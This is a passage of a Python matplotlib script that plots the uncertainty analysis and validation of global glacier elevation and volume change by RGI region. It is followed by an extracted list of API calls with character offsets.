# ax.fill_between(x,40*np.ones(len(x)),y,color='tab:gray')
# arr_res[0,3:]=25.
for i in [0,1,2,3,4,5,6]:
ax.scatter(dts,arr_res[:,i],color=col[i])
# ax.hlines(25,0,3000,linestyles='dashed',color='tab:gray')
ax.plot([],[],color='black',label='Model fit')
ax.fill_between([],[],color=col[0],label='0.15 km')
ax.fill_between([],[],color=col[1],label='2 km')
ax.fill_between([],[],color=col[2],label='5 km')
ax.fill_between([],[],color=col[3],label='20 km')
ax.scatter([],[],color='black',label='Empirical\nvariance')
ax.fill_between([],[],color=col[4],label='50 km')
ax.fill_between([],[],color=col[5],label='200 km')
ax.fill_between([],[],color=col[6],label='500 km')
ax.set_xlim([0,1370])
ax.set_ylim([0,78])
ax.set_ylabel('Variance of elevation differences (m$^{2}$)')
ax.set_xlabel('Days to closest observation $\Delta t$')
ax.vlines(720,0,100,colors='black',linestyles='dashed')
ax.text(740,5,'$\overline{s_{0}(\Delta t)}$: correlated until 0.15 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:orange')
ax.text(800,22,'$s_{1}(\Delta t)$: correlated until 2 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:blue')
ax.text(1150,35,'$s_{3}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:red')
ax.text(1250,48,'$s_{5}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:brown')
# ax.text(1000,22,'Fully correlated = Systematic',bbox= dict(boxstyle='round', facecolor='white', alpha=0.5),color='dimgrey')
# plt.xscale('log')
ax.legend(loc='upper left',bbox_to_anchor=(0.0625,0,0.9375,1),title='Spatial correlations of\nGP elevation with\ntime lag to observation',title_fontsize=6,ncol=2,columnspacing=0.5)
ax.text(0.025, 0.975, 'b', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.text(740,45,'panel (a)',fontweight='bold',va='bottom',ha='left')
# plt.savefig('/home/atom/ongoing/work_worldwide/figures/Figure_S12.png',dpi=360)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[4:6,:6])
corr_ranges = [150, 2000, 5000, 20000, 50000]
coefs = [np.array([1.26694247e-03, 3.03486839e+00]),
np.array([1.35708936e-03, 4.05065698e+00]),
np.array([1.42572733e-03, 4.20851582e+00]),
np.array([1.82537137e-03, 4.28515920e+00]),
np.array([1.87250755e-03, 4.31311254e+00]),
np.array([2.06249620e-03, 4.33582812e+00])]
thresh = [0, 0, 0, 180, 180]
ind = [1, 1, 1, 2, 1]
def sill_frac(t, a, b, c, d):
if t >= c:
return (coefs[-1][0] * t + coefs[-1][1]) ** 2 - (a * t + b) ** 2 - (
(coefs[-1][1] + c * coefs[-1][0]) ** 2 - (coefs[-1 - d][1] + c * coefs[-1 - d][0]) ** 2)
else:
return 0
corr_std_dt = [functools.partial(sill_frac,a=coefs[i][0],b=coefs[i][1],c=thresh[i],d=ind[i]) for i in range(len(corr_ranges))]
list_areas = [100*2**i for i in np.arange(3,31)]
list_df=[]
for area in list_areas:
dt = [180,540,900,1260]
perc_area = [0.5,0.2,0.2,0.1]
dx=100.
nsamp_dt = np.zeros(len(dt)) * np.nan
err_corr = np.zeros((len(dt), len(corr_ranges) + 1)) * np.nan
for j in np.arange(len(dt)):
final_num_err_dt = 10.
nsamp_dt[j] = perc_area[j]*area
sum_var = 0
for k in range(len(corr_ranges)+1):
if k != len(corr_ranges):
err_corr[j,k] = np.sqrt(max(0,corr_std_dt[len(corr_ranges)-1-k](dt[j]) - sum_var))
sum_var += err_corr[j,k] ** 2
else:
err_corr[j, k]=np.sqrt(max(0,final_num_err_dt**2-sum_var))
final_num_err_corr, int_err_corr = (np.zeros( len(corr_ranges) + 1) * np.nan for i in range(2))
for k in range(len(corr_ranges) + 1):
final_num_err_corr[k] = np.sqrt(np.nansum(err_corr[:, k] * nsamp_dt) / np.nansum(nsamp_dt))
if k == 0:
tmp_length = 200000
else:
tmp_length = corr_ranges[len(corr_ranges) - k]
if final_num_err_corr[k] == 0:
int_err_corr[k] = 0
else:
int_err_corr[k] = std_err(final_num_err_corr[k],
neff_circ(area, [(tmp_length, 'Sph', final_num_err_corr[k] ** 2)]))
df_int = pd.DataFrame()
for i in range(len(corr_ranges)):
df_int['err_corr_'+str(corr_ranges[i])] =[int_err_corr[len(corr_ranges)-i]]
df_int['err_corr_200000'] =[int_err_corr[0]]
df_int['area']=area
list_df.append(df_int)
df = pd.concat(list_df)
#First panel: sources for volume change
col = ['tab:orange','tab:blue','tab:olive','tab:red','tab:cyan','tab:brown','tab:gray','tab:pink','tab:purple']
tmp_y = np.zeros(len(list_areas))
tmp_y_next = np.zeros(len(list_areas))
for i in range(6):
tmp_y = tmp_y_next
tmp_y_next = tmp_y + (2*df.iloc[:len(list_areas),i])**2
ax.fill_between(x=np.array(list_areas)/1000000,y1=tmp_y,y2=tmp_y_next,interpolate=True,color=col[i],alpha=0.5,edgecolor=None)
if i == 0:
ax.plot(np.array(list_areas)/1000000,tmp_y_next,color='black',linestyle='--')
ax.fill_between([],[],color=col[0],label='0.15 km',alpha=0.5)
ax.fill_between([],[],color=col[1],label='2 km',alpha=0.5)
ax.fill_between([],[],color=col[2],label='5 km',alpha=0.5)
ax.fill_between([],[],color=col[3],label='20 km',alpha=0.5)
ax.fill_between([],[],color=col[4],label='50 km',alpha=0.5)
ax.fill_between([],[],color=col[5],label='200 km',alpha=0.5)
ax.plot([],[],color='black',linestyle='--',label='Limit GP/spatial\ncorrelation sources')
ax.set_xscale('log')
ax.set_xlabel('Glacier area (km²)')
ax.set_ylabel('Squared uncertainties of\nspecific volume change (m²)')
ax.set_ylim((0,30))
ax.set_xlim((0.005,7.5*10**10/1000000))
handles, labels = ax.get_legend_handles_labels()
# sort both labels and handles by labels
labels, handles = zip(*sorted(zip(labels, handles), key=lambda t: t[0]))
print(labels[0:2])
ax.legend(handles[0:2]+(handles[-1],)+handles[2:-1], labels[0:2]+(labels[-1],)+labels[2:-1],title='Uncertainty sources for specific volume change\n(i.e. mean elevation change)',title_fontsize=6,ncol=3,columnspacing=0.5)
ax.text(0.023,4*1.2,'Uncertainty \nsources from\npixel-wise\nGP regression\n(0.15 km)',color=plt.cm.Greys(0.8),va='center',ha='center')
ax.text(5,4*2,'Uncertainty sources from \nshort- to long-\nrange correlations\n(2 km - 200 km)',color=plt.cm.Greys(0.8),va='center',ha='center')
ax.text(0.025, 0.95, 'c', transform=ax.transAxes, fontsize=8, fontweight='bold', va='top', ha='left')
ax.tick_params(width=0.35,length=2.5)
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats
from pybob.ddem_tools import nmad
df_gp = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv')
df_hr = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.category.values=='matthias')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.area.values<1000000.)
ind = df_hr.perc_meas>0.70
list_rgiid = list(df_hr[ind].rgiid)
list_area = list(df_hr[df_hr.rgiid.isin(list_rgiid)].area)
list_rgiid = [rgiid for _, rgiid in sorted(zip(list_area,list_rgiid),reverse=True)]
list_area = sorted(list_area,reverse=True)
ax = fig.add_subplot(grid[:2, 7:])
kval = 3.5
# sites=np.unique(data['Site'])
# colors=['b','g','r','c','m','y','k','grey']
colors = ['tab:blue','tab:orange','tab:red','tab:grey']
# sites=sites.tolist()
ax.plot([-3, 0.5], [-3, 0.5], color='k', linestyle='-', linewidth=0.75)
label_list=[]
diff2 = []
list_area2 = []
for rgiid in list_rgiid:
df_gp_rgiid = df_gp[df_gp.rgiid==rgiid]
df_hr_rgiid = df_hr[df_hr.rgiid==rgiid]
if df_hr_rgiid.category.values[0]=='matthias':
col = colors[0]
elif df_hr_rgiid.category.values[0]=='brian':
col = colors[1]
else:
if df_hr_rgiid.site.values[0] in ['Chhota','Gangotri','Abramov','Mera']:
col = colors[2]
elif df_hr_rgiid.site.values[0] == 'Yukon':
col=colors[3]
elif df_hr_rgiid.site.values[0] == 'MontBlanc':
col=colors[0]
ax.errorbar(df_hr_rgiid.dhdt.values[0], df_gp_rgiid.dhdt.values[0],
xerr=df_hr_rgiid.err_dhdt.values[0],
yerr=df_gp_rgiid.err_dhdt.values[0],marker='o',mec='k',
ms=kval*(df_hr_rgiid.area.values[0]/1000000)**0.5/3, mew=0.25,elinewidth=0.25,ecolor=col,mfc=col,alpha=0.9)
#,ecolor=colors[sites.index(data['Site'][value])]mfc=colors[sites.index(data['Site'][value])],alpha=0.5)
diff2.append(df_hr_rgiid.dhdt.values[0]-df_gp_rgiid.dhdt.values[0])
list_area2.append(df_hr_rgiid.area.values[0])
ax.text(-1.9,0,'Mean bias:\n'+str(np.round(np.nanmean(diff2),2))+'$\pm$'+str(np.round(2*nmad(diff2)/np.sqrt(len(diff2)),2))+' m yr$^{-1}$',ha='center',va='center',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
print(np.nanmean(diff2))
print(np.nansum(np.array(diff2)*np.array(list_area2))/np.nansum(np.array(list_area2)))
ax.set_ylabel('Specific volume change (m yr$^{-1}$)')
ax.set_xlabel('High-resolution specific volume change (m yr$^{-1}$)')
#plt.legend(loc='upper left')
ax.set_xlim([-2.95, 0.5])
ax.set_ylim([-2.95, 0.5])
#mask = ~np.isnan(b_dot_anomaly) & ~np.isnan(dP)
# slope, intercept, r_value, p_value, std_err = stats.linregress(data['MB GEOD'], data['MB ASTER'])
# print(slope)
# print("r-squared:", r_value**2)
# print('std err:', std_err)
# plt.text(-320, -1250, 'Slope:' + str(np.round(slope, 2)))
# plt.text(-320, -1300, 'r$^{2}$:' + str(np.round(r_value**2, 2)))
## add symbols to show relative size of glaciers
ax.errorbar(-2500/1000,-150/1000,ms = kval*(5.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k',marker='o')
ax.errorbar(-2500/1000,-500/1000,ms = kval*(50.0**0.5)/3, xerr=0.0001, yerr=0.0001,color='k',marker='o')
ax.errorbar(-2500/1000,-1250/1000,ms = kval*(500.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k', marker='o')
ax.text(-2500/1000, -220/1000,'5 km$^2$',va='top',ha='center')
ax.text(-2500/1000, -650/1000,'50 km$^2$',va='top',ha='center')
ax.text(-2500/1000, -1730/1000,'500 km$^2$',va='top',ha='center')
ax.text(0.025,0.966,'d',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.plot([],[],color=colors[0],label='Alps',lw=1)
ax.plot([],[],color=colors[1],label='Western NA',lw=1)
ax.plot([],[],color=colors[2],label='High Mountain Asia',lw=1)
ax.plot([],[],color=colors[3],label='Alaska',lw=1)
ax.plot([],[],color='k',label='1:1 line',lw=0.5)
ax.legend(loc='lower right',title='Validation of volume changes with high-resolution DEMs',title_fontsize=6,ncol=3)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[4:6, 7:])
ax.text(0.025,0.966,'f',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_err_dhdt=[0.1,0.2,0.4,0.6,0.8,1,1.5,2]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_err_dhdt)-1):
ind = np.logical_and(df_gp.err_dhdt < vec_err_dhdt[i+1],df_gp.err_dhdt>=vec_err_dhdt[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
err_dhdt.append(err)
diff_dhdt.append(diff)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_err_dhdt[i+1],vec_err_dhdt[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i < 2:
va_text = 'bottom'
y_off = 0.1
if i == 0:
x_off = -0.05
else:
x_off = 0
else:
va_text = 'top'
y_off = -0.1
ax.text(bin_err[i]+x_off, list_err_emp[i] + y_off, str(nb_gla[i]) + ' gla.\n' + str(np.round(nb_95ci[i] * 100, 0)) + '%',
va=va_text, ha='center')
ax.plot([0,2],[0,2],color='k',label='1:1 line',lw=0.5)
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Error (1$\sigma$) comparison to HR elevation differences\n(printed: glacier number and $\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xlabel('Theoretical specific volume change uncertainty (m yr$^{-1}$)')
ax.set_ylabel('Empirical specific volume\nchange uncertainty (m yr$^{-1}$)')
ax.set_ylim((0,1.4))
ax.legend(loc='upper right',title='Validation of volume change uncertainties\nwith varying uncertainty size',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[2:4, 7:])
ax.text(0.025,0.966,'e',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_area=[0.01,0.05,0.2,1,5,20,200,1500]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_area)-1):
ind = np.logical_and(df_gp.area.values/1000000 < vec_area[i+1],df_gp.area.values/1000000>=vec_area[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
diff_dhdt.append(diff)
err_dhdt.append(err)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_area[i+1],vec_area[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i <2:
va_text = 'top'
y_off = -0.1
else:
va_text = 'bottom'
y_off = 0.1
ax.text(bin_err[i],list_err_emp[i]+y_off,str(nb_gla[i])+' gla.\n'+str(np.round(nb_95ci[i]*100,0))+'%',va=va_text,ha='center')
ax.plot(bin_err,list_err_the,color='black',label='Theoretical uncertainty (1$\sigma$):\nspatially integrated variograms',marker='x')
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Empirical uncertainty (1$\sigma$):\ncomparison to HR elevation differences\n(printed: glacier number and\n$\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xscale('log')
ax.set_xlabel('Glacier area (km$^{2}$)')
ax.set_ylabel('Specific volume\nchange uncertainty (m yr$^{-1}$)')
ax.set_ylim([0,1.4])
ax.legend(loc='upper right',title='Validation of volume change uncertainties\nwith varying glaciers area',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax2 = fig.add_subplot(grid[6:,:])
reg_dir = '/home/atom/ongoing/work_worldwide/vol/final'
list_fn_reg = [os.path.join(reg_dir,'dh_'+str(i).zfill(2)+'_rgi60_int_base_reg.csv') for i in np.arange(1,20)]
list_df_out = []
for fn_reg in list_fn_reg:
df = pd.read_csv(fn_reg)
mult_ann = 20
area = df.area.values[0]
dvol = (df[df.time == '2000-01-01'].dvol.values - df[df.time == '2020-01-01'].dvol.values)[0]
dh = dvol / area
err_dh = np.sqrt(
df[df.time == '2000-01-01'].err_dh.values[0] ** 2 +
df[df.time == '2020-01-01'].err_dh.values[0] ** 2)
err_dvol = np.sqrt((err_dh * area) ** 2 + (dh * df.perc_err_cont.values[0] / 100. * area) ** 2)
dvoldt = dvol / mult_ann
err_dvoldt = err_dvol / mult_ann
dmdt = dvol * 0.85 / 10 ** 9 / mult_ann
err_dmdt = np.sqrt((err_dvol * 0.85 / 10 ** 9) ** 2 + (
dvol * 0.06 / 10 ** 9) ** 2) / mult_ann
sq_err_dmdt_fromdh = (err_dh*area)**2 * (0.85 / mult_ann)**2 /area**2
sq_err_dmdt_fromarea = (dh * df.perc_err_cont.values[0] / 100. * area) ** 2 * (0.85 / mult_ann)**2 /area**2
sq_err_dmdt_fromdensity = (dvol * 0.06) ** 2 / mult_ann**2 / area**2
dmdtda = dmdt/area*10**9
df_out = pd.DataFrame()
df_out['region']=[df.reg.values[0]]
df_out['dmdtda'] = [dmdtda]
df_out['sq_err_fromdh'] = [sq_err_dmdt_fromdh]
df_out['sq_err_fromarea'] = [sq_err_dmdt_fromarea]
df_out['sq_err_fromdensity'] = [sq_err_dmdt_fromdensity]
df_out['area'] = [area]
list_df_out.append(df_out)
df_all = pd.concat(list_df_out)
df_g = pd.DataFrame()
df_g['region']=[21]
df_g['dmdtda'] = [np.nansum(df_all.dmdtda.values*df_all.area.values)/np.nansum(df_all.area.values)]
df_g['sq_err_fromdh'] = [np.nansum(df_all.sq_err_fromdh.values * df_all.area.values **2)/np.nansum(df_all.area.values)**2]
df_g['sq_err_fromarea'] = [np.nansum(df_all.sq_err_fromarea.values * df_all.area.values **2)/np.nansum(df_all.area.values)**2]
df_g['sq_err_fromdensity'] = [np.nansum(df_all.sq_err_fromdensity.values * df_all.area.values **2)/np.nansum(df_all.area.values)**2]
df_g['area'] = [np.nansum(df_all.area.values)]
df_noper = pd.DataFrame()
ind = ~df_all.region.isin([5,19])
df_noper['region']=[20]
df_noper['dmdtda'] = [np.nansum(df_all[ind].dmdtda.values*df_all[ind].area.values)/np.nansum(df_all[ind].area.values)]
df_noper['sq_err_fromdh'] = np.nansum(df_all[ind].sq_err_fromdh.values * df_all[ind].area.values **2)/np.nansum(df_all[ind].area.values)**2
df_noper['sq_err_fromarea'] = np.nansum(df_all[ind].sq_err_fromarea.values * df_all[ind].area.values **2)/np.nansum(df_all[ind].area.values)**2
df_noper['sq_err_fromdensity'] = np.nansum(df_all[ind].sq_err_fromdensity.values * df_all[ind].area.values **2)/np.nansum(df_all[ind].area.values)**2
df_noper['area'] = [np.nansum(df_all[ind].area.values)]
df_all = pd.concat([df_all,df_noper,df_g])
ticks = ['Alaska (01)','Western Canada\nand USA (02)','Arctic Canada\nNorth (03)','Arctic Canada\nSouth (04)','Greenland\nPeriphery (05)', 'Iceland (06)','Svalbard and\nJan Mayen (07)', 'Scandinavia (08)','Russian\nArctic (09)','North Asia (10)','Central\nEurope (11)','Caucasus and\nMiddle East (12)','Central\nAsia (13)','South Asia\nWest (14)','South Asia\nEast (15)','Low\nLatitudes (16)','Southern\nAndes (17)','New\nZealand (18)','Antarctic and\nSubantarctic (19)','Global excl.\n 05 and 19','Global']
x_shift = 0
for i in np.arange(1,22):
if i==20:
x_shift+=2
df_tmp = df_all[df_all.region==i]
y1 = 4*df_tmp.sq_err_fromdh.values[0]
y2 = y1 + 4*df_tmp.sq_err_fromarea.values[0]
y3 = y2 + 4*df_tmp.sq_err_fromdensity.values[0]
ax2.fill_between(x_shift+np.array((i,i+1)),(0,0),(y1,y1),color='tab:red',edgecolor='white')
ax2.fill_between(x_shift+np.array((i,i+1)),(y1,y1),(y2,y2),color='tab:blue',edgecolor='white')
ax2.fill_between(x_shift+np.array((i,i+1)),(y2,y2),(y3,y3),color='tab:pink',edgecolor='white')
ax2.fill_between([],[],color='tab:red',label='Elevation change')
ax2.fill_between([],[],color='tab:blue',label='Glacier outlines')
ax2.fill_between([],[],color='tab:pink',label='Density conversion')
ax2.text(0.025, 0.95, 'g', transform=ax2.transAxes, fontsize=8, fontweight='bold', va='top', ha='left')
ax2.set_ylabel('Squared uncertainties of\nspecific mass change rate (m² w.e. yr$^{-2}$)')
ax2.set_xlabel('RGI region')
ax2.legend(title='Uncertainty sources for\nspecific mass change\nduring 2000-2019',loc='upper right',bbox_to_anchor=(0.3,1),title_fontsize=6)
ax2.set_xticks(list(np.arange(1.5,20.5))+[22.5,23.5])
ax2.set_xticklabels(ticks,rotation=90)
ax2.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0e'))
ax2.fill_between((22,24),(-0.00001,-0.00001),(4*0.000275,4*0.000275),facecolor='None',edgecolor='black')
ax2.text(23,4*0.0005,'panel (h)',fontweight='bold',va='bottom',ha='center')
ax2.tick_params(width=0.35,length=2.5)
ax3 = inset_axes(ax2,width="15%",height='50%',loc='upper right')
x_shift=0
for i in np.arange(20,22):
if i==20:
x_shift+=2
df_tmp = df_all[df_all.region==i]
y1 = 4*df_tmp.sq_err_fromdh.values[0]
y2 = y1 + 4*df_tmp.sq_err_fromarea.values[0]
y3 = y2 + 4*df_tmp.sq_err_fromdensity.values[0]
ax3.fill_between(x_shift+np.array((i,i+1)),(0,0),(y1,y1),color='tab:red',edgecolor='white')
ax3.fill_between(x_shift+np.array((i,i+1)),(y1,y1),(y2,y2),color='tab:blue',edgecolor='white')
ax3.fill_between(x_shift+np.array((i,i+1)),(y2,y2),(y3,y3),color='tab:pink',edgecolor='white')
ax3.set_xlim((22,24))
ax3.set_xticks([22.5,23.5])
ax3.set_ylim((-0.00001,4*0.000275))
ax3.set_xticklabels(ticks[-2:],rotation=90)
ax3.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.0e'))
ax3.text(0.9, 0.95, 'h', transform=ax3.transAxes, fontsize=8, fontweight='bold', va='top', ha='right')
ax3.tick_params(width=0.35,length=2.5)
plt.savefig('/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg',dpi=500,bbox_inches='tight')
|
[
"numpy.abs",
"numpy.nanmedian",
"pandas.read_csv",
"numpy.isnan",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.arange",
"numpy.sin",
"pyddem.volint_tools.neff_circ",
"numpy.sqrt",
"numpy.round",
"numpy.nanmean",
"pandas.DataFrame",
"matplotlib.pyplot.rcParams.update",
"matplotlib.ticker.FormatStrFormatter",
"pandas.concat",
"functools.partial",
"numpy.nansum",
"pybob.ddem_tools.nmad",
"numpy.logical_and",
"mpl_toolkits.axes_grid.inset_locator.inset_axes",
"numpy.array",
"matplotlib.pyplot.GridSpec",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.cm.Greys"
] |
[((272, 309), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'font.size': 5}"], {}), "({'font.size': 5})\n", (291, 309), True, 'import matplotlib.pyplot as plt\n'), ((310, 356), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'lines.linewidth': 0.35}"], {}), "({'lines.linewidth': 0.35})\n", (329, 356), True, 'import matplotlib.pyplot as plt\n'), ((356, 401), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'axes.linewidth': 0.35}"], {}), "({'axes.linewidth': 0.35})\n", (375, 401), True, 'import matplotlib.pyplot as plt\n'), ((401, 447), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'lines.markersize': 2.5}"], {}), "({'lines.markersize': 2.5})\n", (420, 447), True, 'import matplotlib.pyplot as plt\n'), ((447, 490), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'axes.labelpad': 1.5}"], {}), "({'axes.labelpad': 1.5})\n", (466, 490), True, 'import matplotlib.pyplot as plt\n'), ((676, 696), 'pandas.read_csv', 'pd.read_csv', (['all_csv'], {}), '(all_csv)\n', (687, 696), True, 'import pandas as pd\n'), ((4219, 4249), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7.2, 9.3)'}), '(figsize=(7.2, 9.3))\n', (4229, 4249), True, 'import matplotlib.pyplot as plt\n'), ((4291, 4335), 'matplotlib.pyplot.GridSpec', 'plt.GridSpec', (['(8)', '(13)'], {'wspace': '(0.05)', 'hspace': '(0.5)'}), '(8, 13, wspace=0.05, hspace=0.5)\n', (4303, 4335), True, 'import matplotlib.pyplot as plt\n'), ((5106, 5124), 'numpy.array', 'np.array', (['vec_bins'], {}), '(vec_bins)\n', (5114, 5124), True, 'import numpy as np\n'), ((5133, 5150), 'numpy.array', 'np.array', (['vec_exp'], {}), '(vec_exp)\n', (5141, 5150), True, 'import numpy as np\n'), ((6221, 6234), 'numpy.array', 'np.array', (['mod'], {}), '(mod)\n', (6229, 6234), True, 'import numpy as np\n'), ((15049, 15067), 'pandas.concat', 'pd.concat', (['list_df'], {}), '(list_df)\n', (15058, 15067), True, 'import pandas as pd\n'), ((17253, 17319), 'pandas.read_csv', 'pd.read_csv', (['"""/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv"""'], {}), "('/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv')\n", (17264, 17319), True, 'import pandas as pd\n'), ((17328, 17394), 'pandas.read_csv', 'pd.read_csv', (['"""/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv"""'], {}), "('/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv')\n", (17339, 17394), True, 'import pandas as pd\n'), ((27493, 27515), 'pandas.concat', 'pd.concat', (['list_df_out'], {}), '(list_df_out)\n', (27502, 27515), True, 'import pandas as pd\n'), ((27524, 27538), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (27536, 27538), True, 'import pandas as pd\n'), ((28101, 28115), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (28113, 28115), True, 'import pandas as pd\n'), ((28793, 28828), 'pandas.concat', 'pd.concat', (['[df_all, df_noper, df_g]'], {}), '([df_all, df_noper, df_g])\n', (28802, 28828), True, 'import pandas as pd\n'), ((29359, 29375), 'numpy.arange', 'np.arange', (['(1)', '(22)'], {}), '(1, 22)\n', (29368, 29375), True, 'import numpy as np\n'), ((30838, 30899), 'mpl_toolkits.axes_grid.inset_locator.inset_axes', 'inset_axes', (['ax2'], {'width': '"""15%"""', 'height': '"""50%"""', 'loc': '"""upper right"""'}), "(ax2, width='15%', height='50%', loc='upper right')\n", (30848, 30899), False, 'from mpl_toolkits.axes_grid.inset_locator import inset_axes\n'), ((30916, 30933), 'numpy.arange', 'np.arange', (['(20)', '(22)'], {}), '(20, 22)\n', (30925, 30933), True, 'import numpy as np\n'), ((31812, 31924), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg"""'], {'dpi': '(500)', 'bbox_inches': '"""tight"""'}), "('/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg',\n dpi=500, bbox_inches='tight')\n", (31823, 31924), True, 'import matplotlib.pyplot as plt\n'), ((4779, 4830), 'numpy.logical_and', 'np.logical_and', (['(vgm1.bins > 3000)', '(vgm1.bins < 30000)'], {}), '(vgm1.bins > 3000, vgm1.bins < 30000)\n', (4793, 4830), True, 'import numpy as np\n'), ((10128, 10149), 'numpy.arange', 'np.arange', (['(0)', '(3000)', '(1)'], {}), '(0, 3000, 1)\n', (10137, 10149), True, 'import numpy as np\n'), ((12701, 12738), 'numpy.array', 'np.array', (['[0.00126694247, 3.03486839]'], {}), '([0.00126694247, 3.03486839])\n', (12709, 12738), True, 'import numpy as np\n'), ((12754, 12791), 'numpy.array', 'np.array', (['[0.00135708936, 4.05065698]'], {}), '([0.00135708936, 4.05065698])\n', (12762, 12791), True, 'import numpy as np\n'), ((12807, 12844), 'numpy.array', 'np.array', (['[0.00142572733, 4.20851582]'], {}), '([0.00142572733, 4.20851582])\n', (12815, 12844), True, 'import numpy as np\n'), ((12860, 12896), 'numpy.array', 'np.array', (['[0.00182537137, 4.2851592]'], {}), '([0.00182537137, 4.2851592])\n', (12868, 12896), True, 'import numpy as np\n'), ((12913, 12950), 'numpy.array', 'np.array', (['[0.00187250755, 4.31311254]'], {}), '([0.00187250755, 4.31311254])\n', (12921, 12950), True, 'import numpy as np\n'), ((12966, 13002), 'numpy.array', 'np.array', (['[0.0020624962, 4.33582812]'], {}), '([0.0020624962, 4.33582812])\n', (12974, 13002), True, 'import numpy as np\n'), ((13336, 13422), 'functools.partial', 'functools.partial', (['sill_frac'], {'a': 'coefs[i][0]', 'b': 'coefs[i][1]', 'c': 'thresh[i]', 'd': 'ind[i]'}), '(sill_frac, a=coefs[i][0], b=coefs[i][1], c=thresh[i], d=\n ind[i])\n', (13353, 13422), False, 'import functools\n'), ((14805, 14819), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (14817, 14819), True, 'import pandas as pd\n'), ((19462, 19479), 'numpy.nanmean', 'np.nanmean', (['diff2'], {}), '(diff2)\n', (19472, 19479), True, 'import numpy as np\n'), ((21540, 21631), 'numpy.logical_and', 'np.logical_and', (['(df_gp.err_dhdt < vec_err_dhdt[i + 1])', '(df_gp.err_dhdt >= vec_err_dhdt[i])'], {}), '(df_gp.err_dhdt < vec_err_dhdt[i 